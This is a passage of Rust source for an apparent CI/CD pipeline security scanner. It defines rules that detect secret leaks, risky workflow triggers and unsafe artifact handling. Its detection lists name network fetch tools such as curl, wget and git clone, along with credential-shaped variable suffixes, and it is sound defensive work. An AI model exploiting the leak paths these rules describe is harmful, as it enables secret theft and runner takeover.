3548                let orig_name = &body[start..start + name_end];
3549
3550                findings.push(Finding {
3551                    severity: Severity::High,
3552                    category: FindingCategory::SetvariableIssecretFalse,
3553                    path: None,
3554                    nodes_involved: vec![step.id],
3555                    message: format!(
3556                        "ADO setvariable with sensitive name '{}' uses issecret=false or omits issecret flag, value printed in plaintext logs",
3557                        orig_name,
3558                    ),
3559                    recommendation: Recommendation::Manual {
3560                        action: format!(
3561                            "Add `issecret=true` to the setvariable directive: `##vso[task.setvariable variable={};issecret=true]`",
3562                            orig_name,
3563                        ),
3564                    },
3565                    source: FindingSource::BuiltIn,
3566                    extras: FindingExtras::default(),
3567                });
3568            }
3569
3570            cursor = start + name_end;
3571        }
3572    }
3573
3574    findings
3575}
3576
/// Run all rules against a graph.
///
/// Collects the findings of every built-in rule in the fixed order below,
/// removes structurally identical duplicates (same category, involved nodes,
/// and message — the first occurrence is kept), applies compensating
/// controls, and finally sorts the result by `Severity`. The sort is stable,
/// so findings of equal severity stay in rule order.
///
/// `max_hops` is forwarded only to `authority_propagation`; no other rule
/// called here receives it.
pub fn run_all_rules(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
    let mut findings = Vec::new();
    // MVP rules
    findings.extend(authority_propagation(graph, max_hops));
    findings.extend(over_privileged_identity(graph));
    findings.extend(unpinned_action(graph));
    findings.extend(untrusted_with_authority(graph));
    findings.extend(artifact_boundary_crossing(graph));
    // Stretch rules
    findings.extend(long_lived_credential(graph));
    findings.extend(floating_image(graph));
    findings.extend(persisted_credential(graph));
    findings.extend(trigger_context_mismatch(graph));
    findings.extend(cross_workflow_authority_chain(graph));
    findings.extend(authority_cycle(graph));
    findings.extend(uplift_without_attestation(graph));
    findings.extend(self_mutating_pipeline(graph));
    findings.extend(checkout_self_pr_exposure(graph));
    findings.extend(variable_group_in_pr_job(graph));
    findings.extend(self_hosted_pool_pr_hijack(graph));
    findings.extend(shared_self_hosted_pool_no_isolation(graph));
    findings.extend(service_connection_scope_mismatch(graph));
    findings.extend(template_extends_unpinned_branch(graph));
    findings.extend(template_repo_ref_is_feature_branch(graph));
    findings.extend(vm_remote_exec_via_pipeline_secret(graph));
    findings.extend(short_lived_sas_in_command_line(graph));
    // ADO inline-script secret-leak rules
    findings.extend(secret_to_inline_script_env_export(graph));
    findings.extend(secret_materialised_to_workspace_file(graph));
    findings.extend(keyvault_secret_to_plaintext(graph));
    findings.extend(setvariable_issecret_false(graph));
    findings.extend(terraform_auto_approve_in_prod(graph));
    findings.extend(addspn_with_inline_script(graph));
    findings.extend(parameter_interpolation_into_shell(graph));
    // GHA red-team-derived rules
    findings.extend(runtime_script_fetched_from_floating_url(graph));
    findings.extend(pr_trigger_with_floating_action_ref(graph));
    findings.extend(check_homoglyph_in_action_ref(graph));
    findings.extend(untrusted_api_response_to_env_sink(graph));
    findings.extend(pr_build_pushes_image_with_floating_credentials(graph));
    findings.extend(secret_via_env_gate_to_untrusted_consumer(graph));
    // Blue-team positive invariants (negative-space rules — fire on absence
    // of expected defenses)
    findings.extend(no_workflow_level_permissions_block(graph));
    findings.extend(prod_deploy_job_no_environment_gate(graph));
    findings.extend(long_lived_secret_without_oidc_recommendation(graph));
    findings.extend(pull_request_workflow_inconsistent_fork_check(graph));
    findings.extend(gitlab_deploy_job_missing_protected_branch_only(graph));
    findings.extend(terraform_output_via_setvariable_shell_expansion(graph));
    // GHA council Bucket 1 rules
    findings.extend(risky_trigger_with_authority(graph));
    findings.extend(sensitive_value_in_job_output(graph));
    findings.extend(manual_dispatch_input_to_url_or_command(graph));
    // GHA council Bucket 2 rules
    findings.extend(secrets_inherit_overscoped_passthrough(graph));
    findings.extend(unsafe_pr_artifact_in_workflow_run_consumer(graph));
    // GHA council Bucket 3 rules
    findings.extend(script_injection_via_untrusted_context(graph));
    findings.extend(interactive_debug_action_in_authority_workflow(graph));
    findings.extend(pr_specific_cache_key_in_default_branch_consumer(graph));
    findings.extend(gh_cli_with_default_token_escalating(graph));
    // GitLab council Bucket A rules
    findings.extend(ci_job_token_to_external_api(graph));
    findings.extend(id_token_audience_overscoped(graph));
    findings.extend(untrusted_ci_var_in_shell_interpolation(graph));
    // GitLab council Bucket B+C rules
    findings.extend(unpinned_include_remote_or_branch_ref(graph));
    findings.extend(dind_service_grants_host_authority(graph));
    findings.extend(security_job_silently_skipped(graph));
    findings.extend(child_pipeline_trigger_inherits_authority(graph));
    findings.extend(cache_key_crosses_trust_boundary(graph));
    // GitLab red-team Group D rules
    findings.extend(pat_embedded_in_git_remote_url(graph));
    findings.extend(ci_token_triggers_downstream_with_variable_passthrough(
        graph,
    ));
    findings.extend(dotenv_artifact_flows_to_privileged_deployment(graph));

    // Deduplicate structurally identical findings BEFORE compensating controls.
    // Order matters: compensating controls append to finding messages (e.g.
    // " [compensating control: ...]"), so deduping after them would fail to
    // collapse two BFS-duplicate findings where one CC-modified and the other
    // did not. Key on (category, nodes_involved, message) so distinct
    // per-variable findings on the same step are preserved.
    let mut seen_keys: std::collections::HashSet<(FindingCategory, Vec<NodeId>, String)> =
        std::collections::HashSet::new();
    // `insert` returns false for a key already present, so `retain` keeps
    // only the first finding per key.
    findings
        .retain(|f| seen_keys.insert((f.category, f.nodes_involved.clone(), f.message.clone())));

    // Blue-team compensating-control suppressions (downgrade or suppress
    // existing-rule findings when a control elsewhere in the graph
    // neutralises the risk). Applied after dedup so each unique finding
    // gets exactly one CC evaluation.
    apply_compensating_controls(graph, &mut findings);

    // Stable sort: ties keep the rule order established above.
    findings.sort_by_key(|f| f.severity);

    findings
}
3676
3677// ── R3: risky_trigger_with_authority ────────────────────
3678// `issue_comment`, `pull_request_review`, `pull_request_review_comment`, and
3679// `workflow_run` are high-blast-radius triggers — anyone able to comment on
3680// an issue (or any contributor whose previous workflow run completed) can
3681// fire the workflow with secrets in scope. `trigger_context_mismatch` only
3682// fires on `pull_request_target` / ADO `pr`, so this rule closes the gap.
3683
/// Trigger names that confer the same effective blast radius as
/// `pull_request_target` once they're paired with write permissions or
/// non-`GITHUB_TOKEN` secrets.
///
/// Entries are listed alphabetically for readability. Only membership
/// matters to `risky_trigger_with_authority`: it reports matching triggers
/// in the order they appear in `META_TRIGGERS`, not in the order used here.
const RISKY_TRIGGERS: &[&str] = &[
    "issue_comment",
    "pull_request_review",
    "pull_request_review_comment",
    "workflow_run",
];
3693
/// Reports whether a rendered permissions string carries write authority.
///
/// The input is lower-cased, then searched for either marker:
/// - `write-all` — the blanket grant, always treated as write authority;
/// - `: write` — any per-scope grant such as `contents: write`,
///   `pull-requests: write` or `id-token: write`.
///
/// The match is a plain substring search, so it does not depend on how the
/// surrounding map is rendered. A scope written without the space after the
/// colon (`contents:write`) is not recognised.
fn permissions_grant_writes(perm_string: &str) -> bool {
    const WRITE_MARKERS: [&str; 2] = ["write-all", ": write"];

    let normalized = perm_string.to_lowercase();
    WRITE_MARKERS
        .iter()
        .any(|marker| normalized.contains(*marker))
}
3703
3704/// Rule: high-blast-radius trigger (`issue_comment`,
3705/// `pull_request_review[_comment]`, `workflow_run`) declared alongside
3706/// write-grant permissions or any non-`GITHUB_TOKEN` secret.
3707///
3708/// Detection (deterministic, no path traversal):
3709/// 1. Read `META_TRIGGERS` (graph metadata) — comma-joined list of every
3710///    trigger declared under `on:`.
3711/// 2. Filter for entries in `RISKY_TRIGGERS`.
3712/// 3. Inspect every Identity node carrying `META_PERMISSIONS` — if any
3713///    grants `: write` or `write-all`, the workflow holds write authority.
3714/// 4. Scan all Secret nodes; any whose name is not literally `GITHUB_TOKEN`
3715///    counts as a non-default secret in scope.
3716/// 5. Fire one finding per workflow when steps 1–2 match AND (3 OR 4).
3717///
3718/// Severity: High. The blast radius matches `pull_request_target` but the
3719/// trigger surface is broader (anyone with comment access vs. only PR
3720/// authors), so this rule never downgrades by trigger type.
3721pub fn risky_trigger_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
3722    let triggers_meta = match graph.metadata.get(META_TRIGGERS) {
3723        Some(t) => t,
3724        None => return Vec::new(),
3725    };
3726
3727    let risky_present: Vec<&str> = triggers_meta
3728        .split(',')
3729        .map(str::trim)
3730        .filter(|t| RISKY_TRIGGERS.iter().any(|r| r == t))
3731        .collect();
3732
3733    if risky_present.is_empty() {
3734        return Vec::new();
3735    }
3736
3737    // (3) Any Identity node with write permissions?
3738    let mut writes_identities: Vec<NodeId> = Vec::new();
3739    for ident in graph.nodes_of_kind(NodeKind::Identity) {
3740        if let Some(perms) = ident.metadata.get(META_PERMISSIONS) {
3741            if permissions_grant_writes(perms) {
3742                writes_identities.push(ident.id);
3743            }
3744        }
3745    }
3746
3747    // (4) Any non-GITHUB_TOKEN secret in scope?
3748    let non_default_secrets: Vec<NodeId> = graph
3749        .nodes_of_kind(NodeKind::Secret)
3750        .filter(|s| s.name != "GITHUB_TOKEN")
3751        .map(|s| s.id)
3752        .collect();
3753
3754    if writes_identities.is_empty() && non_default_secrets.is_empty() {
3755        return Vec::new();
3756    }
3757
3758    let trigger_label = risky_present.join(", ");
3759    let cause = if !writes_identities.is_empty() && !non_default_secrets.is_empty() {
3760        format!(
3761            "{} write-grant identit{} and {} non-default secret{}",
3762            writes_identities.len(),
3763            if writes_identities.len() == 1 {
3764                "y"
3765            } else {
3766                "ies"
3767            },
3768            non_default_secrets.len(),
3769            if non_default_secrets.len() == 1 {
3770                ""
3771            } else {
3772                "s"
3773            },
3774        )
3775    } else if !writes_identities.is_empty() {
3776        format!(
3777            "{} write-grant identit{}",
3778            writes_identities.len(),
3779            if writes_identities.len() == 1 {
3780                "y"
3781            } else {
3782                "ies"
3783            },
3784        )
3785    } else {
3786        format!(
3787            "{} non-default secret{}",
3788            non_default_secrets.len(),
3789            if non_default_secrets.len() == 1 {
3790                ""
3791            } else {
3792                "s"
3793            },
3794        )
3795    };
3796
3797    let mut nodes_involved = writes_identities.clone();
3798    nodes_involved.extend(non_default_secrets);
3799
3800    vec![Finding {
3801        severity: Severity::High,
3802        category: FindingCategory::RiskyTriggerWithAuthority,
3803        path: None,
3804        nodes_involved,
3805        message: format!(
3806            "Workflow trigger(s) [{trigger_label}] grant the same blast radius as pull_request_target but slip past trigger_context_mismatch — {cause} are reachable from any commenter / upstream-run author"
3807        ),
3808        recommendation: Recommendation::Manual {
3809            action: "Drop write-grant permissions to the minimum the trigger requires (most labelers/triagers only need `pull-requests: write` or `issues: write`), or split the workflow: keep the comment-triggered handler authority-free and gate privileged work behind a separate workflow that an authorized user must dispatch manually.".into(),
3810        },
3811        source: FindingSource::BuiltIn,
3812        extras: FindingExtras::default(),
3813    }]
3814}
3815
3816// ── R4: sensitive_value_in_job_output ───────────────────
3817// `jobs.<id>.outputs.<name>` is written to the run log (only the heuristic
3818// mask protects it) and propagates unmasked via `needs.<job>.outputs.*`.
3819// Sourcing an output from `secrets.*`, an OIDC-bearing step output, or
3820// giving it a credential-shaped name is a structural leak.
3821
/// Name endings that mark a job output as credential-shaped. Each entry is
/// lower-case; `output_name_is_credential_shaped` lower-cases the candidate
/// name before comparing, which makes the match case-insensitive.
const CREDENTIAL_NAME_SUFFIXES: &[&str] = &[
    "_token",
    "_secret",
    "_key",
    "_pem",
    "_password",
    "_credential",
    "_credentials",
    "_api_key",
];

/// Reports whether `name`, once lower-cased, ends with one of
/// `CREDENTIAL_NAME_SUFFIXES`.
///
/// Every suffix starts with `_`, so a bare `token` or a hyphenated
/// `deploy-token` does not qualify.
fn output_name_is_credential_shaped(name: &str) -> bool {
    let folded = name.to_lowercase();
    for suffix in CREDENTIAL_NAME_SUFFIXES {
        if folded.ends_with(suffix) {
            return true;
        }
    }
    false
}
3841
3842/// Rule: a `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
3843/// OIDC-bearing step output, or has a credential-shaped name (suffix
3844/// matches `_token` / `_secret` / `_key` / `_pem` / `_password` /
3845/// `_credential[s]` / `_api_key`).
3846///
3847/// Detection: read `META_JOB_OUTPUTS` (graph metadata) — pipe-delimited
3848/// records of `<job>\t<name>\t<source>`. For each record, fire a finding
3849/// when `source != "literal"` OR `name` matches a credential suffix.
3850///
3851/// Severity:
3852/// - **Critical** when `source == "secret"` (raw `secrets.*` value).
3853/// - **Critical** when `source == "oidc"` (OIDC token leaked via output).
3854/// - **High** when `source == "step_output"` AND name is credential-shaped.
3855/// - **High** when `source == "literal"` AND name is credential-shaped
3856///   (developer is signaling credential intent in the API).
3857/// - Otherwise no finding.
3858pub fn sensitive_value_in_job_output(graph: &AuthorityGraph) -> Vec<Finding> {
3859    let raw = match graph.metadata.get(META_JOB_OUTPUTS) {
3860        Some(s) if !s.is_empty() => s,
3861        _ => return Vec::new(),
3862    };
3863
3864    let mut findings = Vec::new();
3865
3866    for record in raw.split('|') {
3867        // Format: "<job>\t<name>\t<source>"
3868        let mut fields = record.splitn(3, '\t');
3869        let job = match fields.next() {
3870            Some(j) if !j.is_empty() => j,
3871            _ => continue,
3872        };
3873        let name = match fields.next() {
3874            Some(n) if !n.is_empty() => n,
3875            _ => continue,
3876        };
3877        let source = fields.next().unwrap_or("literal");
3878
3879        let credential_named = output_name_is_credential_shaped(name);
3880
3881        let (severity, reason) = match source {
3882            "secret" => (
3883                Severity::Critical,
3884                "value reads `secrets.*` directly — exfiltrated to run log and to every downstream `needs.*.outputs.*` consumer",
3885            ),
3886            "oidc" => (
3887                Severity::Critical,
3888                "value derives from a step that holds an OIDC identity — the federated token leaks through the output channel",
3889            ),
3890            "step_output" if credential_named => (
3891                Severity::High,
3892                "credential-shaped output name backed by a step output — masking is heuristic, downstream consumers see plaintext",
3893            ),
3894            "literal" if credential_named => (
3895                Severity::High,
3896                "credential-shaped output name with a literal value — either the value is a hard-coded secret or the contract leaks credentials to downstream jobs",
3897            ),
3898            _ => continue,
3899        };
3900
3901        findings.push(Finding {
3902            severity,
3903            category: FindingCategory::SensitiveValueInJobOutput,
3904            path: None,
3905            nodes_involved: Vec::new(),
3906            message: format!(
3907                "Job '{job}' declares output '{name}' — {reason}"
3908            ),
3909            recommendation: Recommendation::Manual {
3910                action: "Do not expose secrets, OIDC tokens, or credential-shaped values via `jobs.<id>.outputs.*`. Pass them between steps within a single job using `env:` (which honors masking) or write them to a secure file consumed only by a downstream step. If a downstream job needs to act on a credential, fetch it directly from the secret store inside that job instead of inheriting it through outputs.".into(),
3911            },
3912            source: FindingSource::BuiltIn,
3913            extras: FindingExtras::default(),
3914        });
3915    }
3916
3917    findings
3918}
3919
3920// ── R6: manual_dispatch_input_to_url_or_command ────────
3921// `workflow_dispatch.inputs.*` is attacker-controlled in any repository
3922// where collaborators have `Actions: write`. Flowing an input value into
3923// `curl` / `wget` / `gh api` / a `run:` URL / `actions/checkout` `ref:`
3924// gives the dispatcher arbitrary code execution against the runner — a
3925// pivot from "can run a workflow" to "can land arbitrary code on a
3926// privileged runner".
3927
/// Tokens that indicate command-line consumption of an input value when
/// they appear in the same `run:` body as the input expression. Each token
/// must be matched whole-word so we don't false-positive on `curlier` etc.
///
/// `manual_dispatch_input_to_url_or_command` tests each entry against the
/// script body with `body_contains_command`, which searches for the literal
/// text. Two-word entries therefore match only when the words are separated
/// by exactly one space, as written here.
const COMMAND_SINKS: &[&str] = &[
    "curl",
    "wget",
    "gh api",
    "gh release",
    "gh secret",
    "gh repo",
    "git clone",
    "git fetch",
];
3941
/// Returns true if `body` contains a whole-word occurrence of `needle`.
///
/// A candidate match is "whole word" when the byte immediately before it
/// (if any) and the byte immediately after it (if any) are neither ASCII
/// alphanumeric nor `_`. This avoids matching `curl` inside `curlier` or
/// `my_curl`, and `git fetch` inside `git fetcher`. Non-ASCII bytes count
/// as word boundaries.
///
/// An empty `needle` never matches: it names no command, and scanning for
/// it could not make progress.
///
/// After a rejected candidate the scan resumes one character past the
/// candidate's start rather than past its end, so an occurrence that
/// overlaps a rejected one is still examined (e.g. `"a a"` in `"xa a a"`).
fn body_contains_command(body: &str, needle: &str) -> bool {
    let Some(first) = needle.chars().next() else {
        return false;
    };
    let is_word_byte = |b: u8| b.is_ascii_alphanumeric() || b == b'_';
    let bytes = body.as_bytes();

    let mut start = 0;
    while let Some(rel) = body[start..].find(needle) {
        let abs = start + rel;
        let end = abs + needle.len();

        // `last()` is `None` at the very start of the body, `get(end)` is
        // `None` at the very end — both count as a boundary.
        let before_ok = bytes[..abs].last().map_or(true, |&b| !is_word_byte(b));
        let after_ok = bytes.get(end).map_or(true, |&b| !is_word_byte(b));
        if before_ok && after_ok {
            return true;
        }

        // `body[abs..]` starts with `needle`, so stepping over the needle's
        // first character lands on a char boundary of `body`.
        start = abs + first.len_utf8();
    }
    false
}
3970
/// Returns true if `body` references the dispatch input `name` through the
/// dotted form `inputs.<name>`. The longer `github.event.inputs.<name>`
/// spelling contains that same text, so one search covers both.
///
/// The reference must end at an identifier boundary: the character after
/// `<name>` may not be an ASCII alphanumeric, `_` or `-`. Without that
/// check an input called `url` would also be reported for
/// `inputs.url_suffix` or `inputs.url-base`, which are different inputs.
///
/// The search runs over the raw text and does not require the reference to
/// sit inside `${{ … }}`. An empty `name` never matches.
fn body_references_input(body: &str, name: &str) -> bool {
    if name.is_empty() {
        return false;
    }
    let needle = format!("inputs.{name}");
    body.match_indices(needle.as_str()).any(|(at, matched)| {
        body[at + matched.len()..]
            .chars()
            .next()
            .map_or(true, |c| !(c.is_ascii_alphanumeric() || c == '_' || c == '-'))
    })
}
3980
3981/// Rule: a `workflow_dispatch.inputs.*` value flows into a command sink
3982/// (`curl`, `wget`, `gh api`, `git clone`, …) or `actions/checkout`
3983/// `with.ref:`.
3984///
3985/// Detection:
3986/// 1. Read `META_DISPATCH_INPUTS` — comma-joined list of input names.
3987/// 2. For every Step node carrying `META_SCRIPT_BODY`, fire a finding when
3988///    the body references any input name AND contains a whole-word
3989///    occurrence of any `COMMAND_SINKS` entry.
3990/// 3. For every Step node carrying `META_CHECKOUT_REF`, fire a finding when
3991///    the ref expression references any input name (the ref is consumed by
3992///    `actions/checkout`, which performs `git fetch` / `git checkout`
3993///    against the supplied ref).
3994///
3995/// Severity: High. Dispatch is a privileged operation, but the privileged
3996/// surface is bounded to whoever holds `Actions: write` on the repo —
3997/// narrower than `pull_request_target`, broader than a maintainer-only
3998/// secret.
3999pub fn manual_dispatch_input_to_url_or_command(graph: &AuthorityGraph) -> Vec<Finding> {
4000    let inputs_meta = match graph.metadata.get(META_DISPATCH_INPUTS) {
4001        Some(s) if !s.is_empty() => s,
4002        _ => return Vec::new(),
4003    };
4004
4005    let inputs: Vec<&str> = inputs_meta
4006        .split(',')
4007        .map(str::trim)
4008        .filter(|s| !s.is_empty())
4009        .collect();
4010    if inputs.is_empty() {
4011        return Vec::new();
4012    }
4013
4014    let mut findings = Vec::new();
4015
4016    for step in graph.nodes_of_kind(NodeKind::Step) {
4017        // (a) Script body sink
4018        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
4019            let referenced: Vec<&str> = inputs
4020                .iter()
4021                .copied()
4022                .filter(|name| body_references_input(body, name))
4023                .collect();
4024            if !referenced.is_empty() {
4025                let sinks: Vec<&str> = COMMAND_SINKS
4026                    .iter()
4027                    .copied()
4028                    .filter(|s| body_contains_command(body, s))
4029                    .collect();
4030                if !sinks.is_empty() {
4031                    findings.push(Finding {
4032                        severity: Severity::High,
4033                        category: FindingCategory::ManualDispatchInputToUrlOrCommand,
4034                        path: None,
4035                        nodes_involved: vec![step.id],
4036                        message: format!(
4037                            "Step '{}' interpolates workflow_dispatch input(s) [{}] into command sink(s) [{}] — anyone with Actions:write can pivot the run to attacker-controlled hosts/refs",
4038                            step.name,
4039                            referenced.join(", "),
4040                            sinks.join(", "),
4041                        ),
4042                        recommendation: Recommendation::Manual {
4043                            action: "Pass the input through the step's `env:` block (where the runtime quotes it) and reference `\"$INPUT_NAME\"` in the script. For URLs, validate against an allowlist before fetching. Never let a dispatch input land in a `git clone` / `actions/checkout` ref without an explicit allowlist of permitted refs.".into(),
4044                        },
4045                        source: FindingSource::BuiltIn,
4046                        extras: FindingExtras::default(),
4047                    });
4048                }
4049            }
4050        }
4051
4052        // (b) actions/checkout ref sink
4053        if let Some(ref_expr) = step.metadata.get(META_CHECKOUT_REF) {
4054            let referenced: Vec<&str> = inputs
4055                .iter()
4056                .copied()
4057                .filter(|name| body_references_input(ref_expr, name))
4058                .collect();
4059            if !referenced.is_empty() {
4060                findings.push(Finding {
4061                    severity: Severity::High,
4062                    category: FindingCategory::ManualDispatchInputToUrlOrCommand,
4063                    path: None,
4064                    nodes_involved: vec![step.id],
4065                    message: format!(
4066                        "Step '{}' uses workflow_dispatch input(s) [{}] as the actions/checkout ref — the dispatcher chooses which commit lands on the privileged runner",
4067                        step.name,
4068                        referenced.join(", "),
4069                    ),
4070                    recommendation: Recommendation::Manual {
4071                        action: "Constrain the dispatch input via a `type: choice` `options:` allowlist of permitted refs/branches, or hard-code the ref and accept a different parameter (e.g. release tag) that maps onto a vetted ref.".into(),
4072                    },
4073                    source: FindingSource::BuiltIn,
4074                    extras: FindingExtras::default(),
4075                });
4076            }
4077        }
4078    }
4079
4080    findings
4081}
/// Set of trigger names whose runs are influenced by parties outside the
/// repo's write-permission set — anything that can be initiated by opening a
/// PR, commenting on an issue, or reacting to another workflow's outcome.
///
/// Consulted by `graph_has_risky_trigger` and `first_risky_trigger`, which
/// gate `secrets_inherit_overscoped_passthrough`. This list is a superset of
/// `RISKY_TRIGGERS`: it additionally contains `pull_request` and
/// `pull_request_target`. `unsafe_pr_artifact_in_workflow_run_consumer` does
/// not read it; that rule applies its own narrower `workflow_run` /
/// `pull_request_target` check.
const RISKY_TRIGGER_NAMES: &[&str] = &[
    "pull_request",
    "pull_request_target",
    "pull_request_review",
    "pull_request_review_comment",
    "issue_comment",
    "workflow_run",
];
4095
4096/// Returns true if any trigger name in the comma-joined `META_TRIGGERS` list
4097/// matches a risky trigger.
4098fn graph_has_risky_trigger(graph: &AuthorityGraph) -> bool {
4099    let Some(triggers) = graph.metadata.get(META_TRIGGERS) else {
4100        return false;
4101    };
4102    triggers
4103        .split(',')
4104        .any(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
4105}
4106
4107/// Returns the first risky trigger name present on the graph, for messaging.
4108fn first_risky_trigger(graph: &AuthorityGraph) -> Option<String> {
4109    let triggers = graph.metadata.get(META_TRIGGERS)?;
4110    triggers
4111        .split(',')
4112        .find(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
4113        .map(|s| s.trim().to_string())
4114}
4115
4116/// Rule: reusable workflow call uses `secrets: inherit` under a risky trigger.
4117///
4118/// Fires once per Step node carrying `META_SECRETS_INHERIT = "true"` when the
4119/// graph's `META_TRIGGERS` set contains at least one attacker-influenced
4120/// trigger (`pull_request`, `pull_request_target`, `issue_comment`,
4121/// `workflow_run`, `pull_request_review`, `pull_request_review_comment`).
4122///
4123/// `secrets: inherit` forwards the entire caller secret bag to the callee
4124/// regardless of which secrets the callee actually consumes. Combined with a
4125/// trigger an external party can fire, every secret in scope is one
4126/// compromised callee away from exfiltration.
4127pub fn secrets_inherit_overscoped_passthrough(graph: &AuthorityGraph) -> Vec<Finding> {
4128    if !graph_has_risky_trigger(graph) {
4129        return Vec::new();
4130    }
4131    let trigger = first_risky_trigger(graph).unwrap_or_else(|| "risky".into());
4132
4133    let mut findings = Vec::new();
4134    for step in graph.nodes_of_kind(NodeKind::Step) {
4135        let inherits = step
4136            .metadata
4137            .get(META_SECRETS_INHERIT)
4138            .map(|v| v == "true")
4139            .unwrap_or(false);
4140        if !inherits {
4141            continue;
4142        }
4143
4144        // Find the reusable workflow target the step delegates to (if any) so
4145        // the message can name the callee.
4146        let target_name = graph
4147            .edges_from(step.id)
4148            .filter(|e| e.kind == EdgeKind::DelegatesTo)
4149            .filter_map(|e| graph.node(e.to))
4150            .find(|n| n.kind == NodeKind::Image)
4151            .map(|n| n.name.clone())
4152            .unwrap_or_else(|| "<unknown>".into());
4153
4154        findings.push(Finding {
4155            severity: Severity::High,
4156            category: FindingCategory::SecretsInheritOverscopedPassthrough,
4157            path: None,
4158            nodes_involved: vec![step.id],
4159            message: format!(
4160                "Job '{}' calls reusable workflow '{}' with `secrets: inherit` while the workflow is triggered by '{}' — every caller secret forwards to the callee regardless of need",
4161                step.name, target_name, trigger
4162            ),
4163            recommendation: Recommendation::Manual {
4164                action: "Replace `secrets: inherit` with an explicit `secrets:` mapping listing only the secrets the callee actually consumes. For PR/comment/workflow_run-triggered callers, audit the callee for log exposure of every forwarded secret.".into(),
4165            },
4166            source: FindingSource::BuiltIn,
4167            extras: FindingExtras::default(),
4168        });
4169    }
4170
4171    findings
4172}
4173
4174/// Rule: `workflow_run`/`pull_request_target` consumer downloads a PR-context
4175/// artifact AND interprets its content into a privileged sink.
4176///
4177/// Requires:
4178/// 1. Graph trigger is `workflow_run` or `pull_request_target` (the producer
4179///    ran in PR context, so the artifact is attacker-controlled).
4180/// 2. At least one Step in a job carries `META_DOWNLOADS_ARTIFACT = "true"`.
4181/// 3. At least one Step in the *same job* carries
4182///    `META_INTERPRETS_ARTIFACT = "true"` (post-to-comment, write to
4183///    `$GITHUB_ENV`, `eval`, `unzip`, `cat`, `jq`, …).
4184///
4185/// Differs from `artifact_boundary_crossing`: that rule flags upload→download
4186/// trust crossings on Artifact nodes; this rule additionally requires the
4187/// consumer interprets the downloaded content.
4188pub fn unsafe_pr_artifact_in_workflow_run_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
4189    // Trigger gate: workflow_run consumers and pull_request_target both run
4190    // in upstream-repo context with elevated permissions while the artifact
4191    // (or PR head ref) originates from PR context.
4192    let triggers_ok = {
4193        let single = graph
4194            .metadata
4195            .get(META_TRIGGER)
4196            .map(|s| s == "workflow_run" || s == "pull_request_target")
4197            .unwrap_or(false);
4198        let multi = graph
4199            .metadata
4200            .get(META_TRIGGERS)
4201            .map(|s| {
4202                s.split(',')
4203                    .any(|t| t.trim() == "workflow_run" || t.trim() == "pull_request_target")
4204            })
4205            .unwrap_or(false);
4206        single || multi
4207    };
4208    if !triggers_ok {
4209        return Vec::new();
4210    }
4211
4212    // Group steps by job name so we can pair download + interpret within a job.
4213    use std::collections::BTreeMap;
4214    let mut by_job: BTreeMap<String, (Vec<NodeId>, Vec<NodeId>)> = BTreeMap::new();
4215    for step in graph.nodes_of_kind(NodeKind::Step) {
4216        let job = step
4217            .metadata
4218            .get(META_JOB_NAME)
4219            .cloned()
4220            .unwrap_or_default();
4221        let entry = by_job.entry(job).or_default();
4222        if step
4223            .metadata
4224            .get(META_DOWNLOADS_ARTIFACT)
4225            .map(|v| v == "true")
4226            .unwrap_or(false)
4227        {
4228            entry.0.push(step.id);
4229        }
4230        if step
4231            .metadata
4232            .get(META_INTERPRETS_ARTIFACT)
4233            .map(|v| v == "true")
4234            .unwrap_or(false)
4235        {
4236            entry.1.push(step.id);
4237        }
4238    }
4239
4240    let mut findings = Vec::new();
4241    for (job, (downloaders, interpreters)) in by_job {
4242        if downloaders.is_empty() || interpreters.is_empty() {
4243            continue;
4244        }
4245        let mut nodes_involved = downloaders.clone();
4246        nodes_involved.extend(interpreters.iter().copied());
4247
4248        let job_label = if job.is_empty() {
4249            "<workflow-level>".to_string()
4250        } else {
4251            job
4252        };
4253
4254        findings.push(Finding {
4255            severity: Severity::High,
4256            category: FindingCategory::UnsafePrArtifactInWorkflowRunConsumer,
4257            path: None,
4258            nodes_involved,
4259            message: format!(
4260                "Job '{}' downloads a PR-context artifact and interprets its content (post-to-comment, $GITHUB_ENV write, eval/unzip/cat/jq) — malicious PRs can write arbitrary content into the artifact while the consumer runs with upstream-repo authority",
4261                job_label
4262            ),
4263            recommendation: Recommendation::Manual {
4264                action: "Treat downloaded artifacts as untrusted: validate against a strict schema before parsing, never feed contents into `eval`/`$GITHUB_ENV`/`$GITHUB_OUTPUT`, and post comment bodies through a length-and-character-allowlist filter. Where possible, separate the privileged-sink step into its own job that does not download the artifact.".into(),
4265            },
4266            source: FindingSource::BuiltIn,
4267            extras: FindingExtras::default(),
4268        });
4269    }
4270
4271    findings
4272}
4273
4274// ── GHA security rules from corpus gap analysis ─────────────────────────
4275//
4276// Source: MEMORY/WORK/20260425-230443_taudit-gitlab-parser/corpus-results/council-gha-gaps.md
4277// Rules R1, R5, R9, R10. All four read META_SCRIPT_BODY (R1, R10) or
4278// step-level metadata stamped by the GHA parser (R5, R9). They gate on
4279// META_TRIGGERS where a specific trigger surface is required.
4280
/// Reports whether the comma-separated trigger list in `triggers_csv`
/// contains at least one name from `wanted`.
///
/// Each entry is trimmed before the comparison, so padding around commas is
/// ignored. `None` yields `false`. An empty entry (e.g. from `a,,b`) only
/// matches if `wanted` itself contains the empty string.
fn triggers_contain_any(triggers_csv: Option<&String>, wanted: &[&str]) -> bool {
    triggers_csv.map_or(false, |csv| {
        csv.split(',')
            .any(|entry| wanted.contains(&entry.trim()))
    })
}
4292
/// Locates every `${{ ... }}` expression in `body`, left to right.
///
/// Each result pairs the trimmed text between the delimiters with the byte
/// range of the whole expression, from the `$` through the closing `}}`, so
/// callers can inspect the surrounding context.
///
/// An expression ends at the first `}}` after its opener; a `}}` nested
/// inside the expression is not handled. An opener with no closing `}}`
/// ends the scan.
fn find_template_expressions(body: &str) -> Vec<(String, std::ops::Range<usize>)> {
    const OPEN: &str = "${{";
    const CLOSE: &str = "}}";

    let mut found = Vec::new();
    let mut resume_at = 0usize;
    loop {
        let Some(open) = body[resume_at..].find(OPEN).map(|rel| resume_at + rel) else {
            break;
        };
        let inner_start = open + OPEN.len();
        let Some(close) = body[inner_start..]
            .find(CLOSE)
            .map(|rel| inner_start + rel)
        else {
            break;
        };
        let end = close + CLOSE.len();

        found.push((body[inner_start..close].trim().to_string(), open..end));
        resume_at = end;
